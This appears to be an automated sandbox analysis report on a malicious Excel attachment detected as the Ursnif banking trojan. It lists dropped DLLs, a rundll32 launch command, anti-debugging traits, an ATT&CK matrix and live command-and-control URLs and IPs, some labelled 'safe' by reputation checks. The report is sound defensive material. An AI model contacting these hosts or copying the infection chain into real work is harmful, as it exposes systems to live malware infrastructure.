      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://tasks.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownHTTPS traffic detected: 192.185.16.102:443 -> 192.168.2.6:49728 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      E-Banking Fraud:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      System Summary:

      barindex
      Office process drops PE fileShow sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\ddg\11.dllJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dllJump to dropped file
      Writes registry values via WMIShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC41AD1 NtMapViewOfSection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC41C22 GetProcAddress,NtCreateSection,memset,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC423C5 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A17925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1B169 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC421A4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A140B3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1AF44
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC68FAA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6AF74
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC65A1A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC72D21
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC70C89
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC724BC
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@6/10@4/3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1229C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{8D47CC7A-5DAB-4020-89AB-89D27B6C21E5} - OProcSessId.datJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Attached_File_898318.xlsbInitial sample: OLE zip file path = docProps/thumbnail.wmf
      Source: Attached_File_898318.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: Attached_File_898318.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: Binary string: c:\OldMust\LevelChange\againstlaw\each.pdb source: 2200[1].dll.0.dr
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC42140 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC42193 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1E6BE push esp; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1AC00 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1E1AF push ebx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1AF33 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1E163 push edx; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC50B9B push ecx; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC54B10 push ebx; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC54B38 push ebx; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC692D5 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC54E84 push 8D039560h; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC56A7E push ebx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC56A03 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC56197 push esp; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC569A7 push edi; ret
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\ddg\11.dllJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dllJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\ddg\11.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dllJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A17DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node

      Anti Debugging:

      barindex
      Found API chain indicative of debugger detectionShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6DF2F _memset,IsDebuggerPresent,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6E881 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC88303 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC87E40 push dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC88239 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6950C GetProcessHeap,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6DC66 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A18B98 cpuid
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC41000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A18B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC4166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

      Stealing of Sensitive Information:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsNative API2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery13Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution4Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery34Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Attached_File_898318.xlsb0%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      urbandancecity.com0%VirustotalBrowse
      api10.laptok.at11%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
      https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%VirustotalBrowse
      https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      http://139.162.190.91/campo/a/a.D0%Avira URL Cloudsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      http://majorleave.net0%Avira URL Cloudsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      http://api10.laptok.at/api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j0%Avira URL Cloudsafe
      http://api10.laptok.at/api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k0%Avira URL Cloudsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
      http://api10.laptok.at/favicon.ico0%Avira URL Cloudsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      urbandancecity.com
      192.185.16.102
      truefalseunknown
      api10.laptok.at
      35.228.31.40
      truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
